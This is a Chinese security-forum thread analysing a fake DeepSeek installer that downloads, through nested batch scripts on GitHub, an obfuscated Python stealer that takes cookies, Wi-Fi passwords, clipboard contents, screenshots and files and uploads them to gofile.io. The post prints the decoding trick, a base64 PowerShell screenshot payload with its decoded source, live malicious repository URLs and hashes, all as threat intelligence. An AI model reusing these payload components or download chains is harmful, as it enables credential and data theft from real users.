吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 8292|回复: 153
收起左侧

[PC样本分析] 警惕,黑客借助DeepSeek热潮投放后门木马窃取用户密码

    [复制链接]
ahov 发表于 2025-2-14 16:46
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 ahov 于 2025-2-14 17:34 编辑

背景

在日常样本巡逻中,我们在今天发现了一个名为Install_DeepSeek.exe的可疑样本在传播,如下图所示:
Snipaste_2025-02-14_12-00-58.png

该样本打着DeepSeek的图标,无有效数字签名,pdb路径为C:\Users\Administrator\source\repos\Bind\Bind\obj\Release\Bind.pdb,这引起了我们的警觉和怀疑,如下图所示:
Snipaste_2025-02-14_12-03-15.png

经过分析,我们确定,该样本会从黑客GitHub仓库中下载多层脚本和下载者,嵌套下载,最终通过下载得到一个使用Python编写的恶意脚本用于执行后门行为并窃取密码。截至本文撰写时该py脚本首次在VirusTotal多引擎扫描平台上传并扫描,静态检出率为0%,如下图所示:
Snipaste_2025-02-14_11-56-49.png

同时,我们发现黑客的GitHub账户上有多个类似的仓库,均在几个月或几周前上传了恶意软件,如下图所示:
IMG_1226.jpg

样本分析

Install_DeepSeek.exe的主要行为是下载https://github.com/nvslks/g/raw/refs/heads/g/g.zip,如下图所示:
Snipaste_2025-02-14_12-24-07.png

https://github.com/nvslks/g仓库中有一个Bind.exe,经过分析后确认行为与上述Install_DeepSeek.exe基本一致,如下图所示:
Snipaste_2025-02-14_15-07-50.png

我们将g.zip下载后分析,发现里面压缩了一个g.bat,如下图所示:
Snipaste_2025-02-14_12-28-44.png

g.bat的行为依次是:

  1. 下载https://github.com/nvslks/g/raw/refs/heads/g/1.zip
  2. 将下载到的文件保存为%TEMP%\4g5h790g2345h7890g2345h90g2345h-890v2345hf789-3v5h.zip
  3. 使用PowerShell解压缩%TEMP%\4g5h790g2345h7890g2345h90g2345h-890v2345hf789-3v5h.zip%TEMP%
  4. 隐藏执行PowerShell,启动%TEMP%\1.bat,然后退出
    如下图所示:
    Snipaste_2025-02-14_12-30-09.png

1.zip之中,我们发现里面携带了一个Python环境,如下图所示:
Snipaste_2025-02-14_12-39-46.png

其中,压缩包内伪装的svchost.exePython 3.11.150.1013解释器,如下图所示:
Snipaste_2025-02-14_12-43-27.png
Snipaste_2025-02-14_12-43-50.png

1.bat的作用是:使用压缩包内携带的Python解释器执行同目录下的python.py,如下图所示:
Snipaste_2025-02-14_12-45-55.png

该恶意软件的核心组件就是该python.py,我们对其进行分析。
进入python.py后,我们发现代码可能经过了混淆或最小化处理,无法直接进行阅读,如下图所示:
Snipaste_2025-02-14_12-51-06.png
Snipaste_2025-02-14_12-52-51.png

样本将代码字符转换为了列表中的数字,将列表存储进xlicesvaoy变量中,执行时再通过以下代码还原出原先的代码并执行:

xlicesvaoy = ''.join([chr(int(x) - 79) for x in xlicesvaoy])  // 将列表中的数字还原为代码字符
exec(xlicesvaoy)  // 通过exec()函数直接执行当前xlicesvaoy变量中的代码

我们将xlicesvaoy列表复制出来,执行decoded = ''.join(chr(int(n)-79) for n in xlicesvaoy)再将decoded输出或写入至文件就可以得到该Python脚本的可读代码,如下图所示:
Snipaste_2025-02-14_13-16-06.png

代码中的常量,如下图所示(木马后续的代码逻辑可能会见到,因此先进行展示):
code0.png

进入代码后,首先最令人难忘的是一堆brouwser_paths,如下图所示:
Snipaste_2025-02-14_13-24-19.png
code1.png

在此之后紧接着的是class Maincookie,该class下的函数会寻找浏览器和浏览器User Data位置,尝试使用命令行taskkill /f /im ProcessName的方式结束正在运行的浏览器进程;命令行参数指定User Data目录,以调试模式启动浏览器进程;提取并保存浏览器cookies,压缩为zip(获取国家和IP地址作为zip压缩包文件名)并上传发送给黑客,相关代码如下图所示:
code2.png

之后一个class Variables用于初始化变量,从变量名中可以看到该后门木马会尝试获取浏览器Cookies、浏览器历史记录、浏览器文件下载记录、浏览器书签、无线局域网SSID及密码、系统信息、剪贴板内容、进程列表、一些社交软件&游戏平台账号Tokens等,如下图所示:
code3.png

class SubModules下的函数主要进行一些加解密操作(例如解密密码等)、创建互斥体、判断当前状态下是否具有管理员权限等,相关代码如下图所示:
code4.png

接下来是class StealSystemInformation下的函数:

  1. GetDefaultSystemEncoding(self)函数在cmd.exe中执行chcp命令获取当前系统cmd命令行输出内容的编码方式。
  2. StealSystemInformation(self)函数通过命令行执行并输出System Info(systeminfo, 系统信息)&tasklist(进程列表)&tasklist /svc(进程和服务的对应关系)&ipconfig(TCP/IP配置的设置值)&ipconfig/all(TCP/IP配置的详细信息)&Route Table(路由表)&route print(当前路由表中的所有条目)&Firewallinfo(防火墙信息)等。
  3. StealProcessInformation(self)函数通过执行tasklist /FO LIST命令获取list格式的当前进程列表。
  4. StealLastClipBoard(self)函数通过执行PowerShellGet-Clipboard命令获取当前剪贴板内容
  5. StealNetworkInformation(self)函数获取IP地址、国家、城市、时区、运营商
  6. StealWifiInformation(self)函数获取本地无线局域网信息、无线局域网SSID及密码
    相关代码如下图所示:
    code5.png

该木马程序的核心实现部分在class Main下,Main class下的变量和函数非常多,不再一一展示,Main class的结构大纲如下图所示:
Snipaste_2025-02-14_14-26-56.png

需要特别提及的是,该木马获取屏幕截图是在Main class下的WriteToText(self)函数下,通过执行base64编码过的PowerShell命令:

command = "JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAUwBjAHIAZQBlAG4AcwBoAG8AdAANAAoAewANAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AIABDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAHIAZQBzAHUAbAB0AHMAIAA9ACAAbgBlAHcAIABMAGkAcwB0ADwAQgBpAHQAbQBhAHAAPgAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgAHYAYQByACAAYQBsAGwAUwBjAHIAZQBlAG4AcwAgAD0AIABTAGMAcgBlAGUAbgAuAEEAbABsAFMAYwByAGUAZQBuAHMAOwANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoAFMAYwByAGUAZQBuACAAcwBjAHIAZQBlAG4AIABpAG4AIABhAGwAbABTAGMAcgBlAGUAbgBzACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB0AHIAeQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABSAGUAYwB0AGEAbgBnAGwAZQAgAGIAbwB1AG4AZABzACAAPQAgAHMAYwByAGUAZQBuAC4AQgBvAHUAbgBkAHMAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEIAaQB0AG0AYQBwACAAYgBpAHQAbQBhAHAAIAA9ACAAbgBlAHcAIABCAGkAdABtAGEAcAAoAGIAbwB1AG4AZABzAC4AVwBpAGQAdABoACwAIABiAG8AdQBuAGQAcwAuAEgAZQBpAGcAaAB0ACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdQBzAGkAbgBnACAAKABHAHIAYQBwAGgAaQBjAHMAIABnAHIAYQBwAGgAaQBjAHMAIAA9ACAARwByAGEAcABoAGkAYwBzAC4ARgByAG8AbQBJAG0AYQBnAGUAKABiAGkAdABtAGEAcAApACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABnAHIAYQBwAGgAaQBjAHMALgBDAG8AcAB5AEYAcgBvAG0AUwBjAHIAZQBlAG4AKABuAGUAdwAgAFAAbwBpAG4AdAAoAGIAbwB1AG4AZABzAC4ATABlAGYAdAAsACAAYgBvAHUAbgBkAHMALgBUAG8AcAApACwAIABQAG8AaQBuAHQALgBFAG0AcAB0AHkALAAgAGIAbwB1AG4AZABzAC4AUwBpAHoAZQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcgBlAHMAdQBsAHQAcwA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKACIAQAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoAJABzAGMAcgBlAGUAbgBzAGgAbwB0AHMAIAA9ACAAWwBTAGMAcgBlAGUAbgBzAGgAbwB0AF0AOgA6AEMAYQBwAHQAdQByAGUAUwBjAHIAZQBlAG4AcwAoACkADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

解码后命令为:

$source = @"

using System;

using System.Collections.Generic;

using System.Drawing;

using System.Windows.Forms;

public class Screenshot

{

    public static List<Bitmap> CaptureScreens()

    {

        var results = new List<Bitmap>();

        var allScreens = Screen.AllScreens;

        foreach (Screen screen in allScreens)

        {

            try

            {

                Rectangle bounds = screen.Bounds;

                using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))

                {

                    using (Graphics graphics = Graphics.FromImage(bitmap))

                    {

                        graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);

                    }

                    results.Add((Bitmap)bitmap.Clone());

                }

            }

            catch (Exception)

            {

            }

        }

        return results;

    }

}

"@

Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms

$screenshots = [Screenshot]::CaptureScreens()

for ($i = 0; $i -lt $screenshots.Count; $i++){

    $screenshot = $screenshots[$i]

    $screenshot.Save("./Display ($($i+1)).png")

    $screenshot.Dispose()

}

如下图所示:
IMG_1227.jpg

class UploadGoFile下的upload_file(file_path)函数会将待上传的文件上传到https://store1.gofile.io/contents/uploadfile,然后获取到文件分享链接,之后程序再将文件分享链接上传发送给黑客,相关代码如下图所示:
code6.png

class StealCommonFiles下的函数会根据文件内容、文件大小、文件拓展名等文件特征选择性窃取文件,压缩为zip并上传发送给黑客(将国家、IP地址和文件所在驱动器号作为zip压缩包文件名),相关代码、关键词、文件拓展名,如下图所示:
code7.png

程序在启动时会直接执行Maincookie Main class 下的函数和StealCommonFiles().StealFiles(),如下图所示:
code8.png

附录

(一)恶意行为者资产
GitHub账户:https://github.com/nvslks
相关GitHub仓库:
https://github.com/nvslks/g (本文分析样本)
https://github.com/nvslks/h
https://github.com/nvslks/f
https://github.com/nvslks/b
https://github.com/nvslks/a
https://github.com/nvslks/c
https://github.com/nvslks/e
https://github.com/nvslks/d
截至本文撰写时仍然可访问。
(二)本文分析样本Hash (SHA-256)
Install_DeepSeek.exe - c9d815df845f5e13e8ef1142cb2dec8f97a449d639be2b38bdd75beaacff70b8
Bind.exe - 9d09a10bfa2aeb89aba5e20e88fb4fc1f56392d859d0592db66221a9f00000c4
g.bat - 25696f0af2570b4ab6013ff7dcb6995dcfaff31323ad05b268a680a2411ccf0a
1.bat - 1003d1b243a01a0a518491d0af6c67e33b8d904762b5de167b39acec05ca46f4
python.py - f6d47d223401627eb4978b7582368854d271d6446b3137dac5ce99cb46efd886

免费评分

参与人数 97吾爱币 +90 热心值 +91 收起 理由
Wilson16 + 1 + 1 谢谢@Thanks!
120305 + 1 + 1 用心讨论,共获提升!
bry + 1 + 1 我很赞同!
vancish + 1 我很赞同!
33bushi9 + 1 + 1 谢谢@Thanks!
Teaser + 1 + 1 热心回复!
ly765893958 + 1 + 1 我很赞同!
Lemon1001 + 1 + 1 谢谢@Thanks!
jingni00 + 1 + 1 我很赞同!
brIckZ + 1 我很赞同!
uhhuh + 1 我很赞同!
nishuidechali + 1 + 1 谢谢@Thanks!
jiaxin9873 + 1 + 1 分析过程很精彩
GH3 + 1 + 1 我很赞同!
ljt543 + 1 + 1 用心讨论,共获提升!
Night1918 + 1 + 1 谢谢@Thanks!
刀锋浪子 + 1 + 1 我很赞同!
一只青蛙 + 1 谢谢@Thanks!
papilion_n + 1 + 1 用心讨论,共获提升!
zhaom1971 + 1 + 1 我很赞同!
SunSinCruel + 1 谢谢@Thanks!
fengbolee + 2 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
timeni + 1 + 1 谢谢@Thanks!
cheayoo + 1 + 1 热心回复!
Barrrrrry + 1 谢谢@Thanks!
isteven + 1 + 1 谢谢@Thanks!
cheng333 + 1 + 1 谢谢@Thanks!
owenlrj + 1 + 1 我很赞同!
command200 + 1 + 1 用心讨论,共获提升!
nfscarbon + 1 + 1 谢谢@Thanks!
airzen + 1 + 1 用心讨论,共获提升!
准武大研究生 + 1 + 1 热心回复!
xql123456 + 1 我很赞同!
tianluo + 1 + 1 热心回复!
xyiter + 1 + 1 我很赞同!
叮当东东当当 + 1 + 1 我很赞同!
20221111zhuce + 1 哇,谢谢大佬解析
AAZZZhang + 1 + 1 谢谢@Thanks!
bfmr521 + 1 + 1 用心讨论,共获提升!
世界第一胖 + 1 + 1 用心讨论,共获提升!
ioyr5995 + 1 + 1 我很赞同!
guoruihotel + 1 + 1 谢谢@Thanks!
树下彩虹025 + 2 + 1 鼓励转贴优秀软件安全工具和文档!
xiaodown + 1 + 1 用心讨论,共获提升!
Fanlo + 1 用心讨论,共获提升!
zlixunnhuan + 1 + 1 用心讨论,共获提升!
情人果 + 1 + 1 谢谢@Thanks!
codinglife + 1 + 1 我很赞同!
kenna.cc + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
奶小孩速行 + 2 + 1 谢谢@Thanks!
allspark + 1 + 1 用心讨论,共获提升!
mldonkey + 1 + 1 大佬,有没有样本上传一下
wsxdc123456 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
暗夜十二乐章 + 1 + 1 谢谢@Thanks!
aaddmmiinn + 1 热心回复!
半杯不倒 + 1 + 1 感谢高手分析示警。给你点赞!
皇家诗人 + 1 + 1 我很赞同!
筱良i + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
InfiniteBoy + 1 + 1 用心讨论,共获提升!
kkkpps + 1 我很赞同!
Cleverwwh + 1 + 1 我很赞同!
Mrcyong + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
eve20312 + 1 谢谢@Thanks!
tzxinqing + 2 + 1 我很赞同!
fengling2021 + 1 + 1 我很赞同!
jinlide1101 + 1 + 1 谢谢@Thanks!
ChiXun + 1 + 1 谢谢@Thanks!
gameyw + 1 + 1 谢谢@Thanks!
woshidawang + 1 + 1 我很赞同!
x1绯月 + 1 + 1 热心回复!
stysty0930 + 1 + 1 我很赞同!
yxwudi + 1 + 1 谢谢@Thanks!
cioceo + 1 谢谢@Thanks!
Xubh + 1 热心回复!
哭泣滴梦 + 1 谢谢@Thanks!
LaLuna2046 + 1 + 1 谢谢@Thanks!
llwdllw + 1 + 1 谢谢@Thanks!
purusi + 1 + 1 谢谢@Thanks!
zj23308 + 1 + 1 我很赞同!
0jiao0 + 1 + 1 谢谢@Thanks!
zzldy4 + 1 我很赞同!
feideman + 1 + 1 我很赞同!
baiye373 + 1 + 1 我很赞同!
mrjian + 1 + 1 谢谢@Thanks!
ACERC + 1 + 1 谢谢@Thanks!
icesms + 1 + 1 谢谢@Thanks!
Cyberpunk2077 + 1 + 1 我很赞同!
qq9953 + 1 谢谢@Thanks!
周坤 + 1 + 1 用心讨论,共获提升!
zxcvbnm12 + 1 我很赞同!
zxinyun + 2 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Ichbinich + 1 + 1 谢谢@Thanks!
風信子 + 1 + 1 我很赞同!
loveqq520 + 1 + 1 我很赞同!
maheadst + 2 + 1 我很赞同!
z909022684 + 1 + 1 我很赞同!
congcongzhidao + 1 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| ahov 发表于 2025-3-1 14:02
经确认,360威胁情报中心于2025年02月28日发表的《警惕银狐等黑客团伙实施的的大规模DeepSeek仿冒钓鱼攻击》中的「样本一」与本文中分析的样本属于同源样本。
从文中可以看到,恶意软件作者更换了GitHub账户: https://github.com/lee2313456
恶意仓库仍是以单个英文字符命令"f"命名: https://github.com/lee2313456/f
如下图所示:
IMG_1395.jpg
IMG_1394.jpg
IMG_1403.jpg
goblack 发表于 2025-2-14 19:00
zxcvbnm12 发表于 2025-2-14 18:14
尽量自己从官方途径下载,下载别人的可以虚拟机用用得了(这样应该可以)

你没考虑这些方面。随便举两点。。。。
1、虚拟机逃逸。。。。。国内某厂的大额转账用的浏览器安全控件会这么干,逃逸到母机后隐藏进程信息,收集了相当多的信息,我已经抓到,亲测可以复现,支持kvm hyper-v vmware三种主流虚拟化原理,意味着全平台覆盖。基于这些二开的proxmox ve/ovirt或者手搓kvm这类一个也逃不了 。具体信息就不是我这种人微言轻的能发表的了,这比乌云更乌的事我可不敢揭露
2、互联网谁接入谁负责。。。。比如某些minecraft整合包里面就有支持远程给控制的脚本,可以在适当的时候对特定的服务器进行motd压测,海量的IP与正常用户IP混淆无法简单区分难以防护。。至于更大的,随意哪个都不是普通人受得了的。。。

当然,比直接在自己常用的电脑系统运行肯定是强不少。。。。。有的人自己微博、贴吧、QQ莫名其妙发布奇怪的东西就是类似的原因。。。
anning666 发表于 2025-2-14 17:04
第一见到用python写的恶意脚本 ,本质就是获取用户的各种信息,然后回传给作者,谢谢分享!

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
2595387669 + 1 + 1 我很赞同!

查看全部评分

QZMASE 发表于 2025-2-14 23:35
移动网络下,github时不时会抽风无法访问,一定程度上能防止这个病毒。。。
yhzh 发表于 2025-2-14 21:42
感谢分享,我一般对来源不大可信的都会用virustotal看看,没想到全部通过的也可能是木马这些
gracenshan 发表于 2025-2-14 17:30
原版的经常卡卡卡
 楼主| ahov 发表于 2025-2-14 16:50
本帖最后由 ahov 于 2025-2-14 17:33 编辑

markdown错误已解决
maheadst 发表于 2025-2-14 16:56
好贴,值得学习,高手。
xiachuan980 发表于 2025-2-14 17:13
请问需要怎么避免呢防范?
5iAnn2020 发表于 2025-2-14 17:44
感谢高手分析示警。给你点赞!
changyufeichang 发表于 2025-2-14 17:54
感谢高手示警 。给你点赞!
af8889 发表于 2025-2-14 18:00
请问需要怎么查杀防范?
zxcvbnm12 发表于 2025-2-14 18:14
尽量自己从官方途径下载,下载别人的可以虚拟机用用得了(这样应该可以)
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2025-3-22 22:56

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表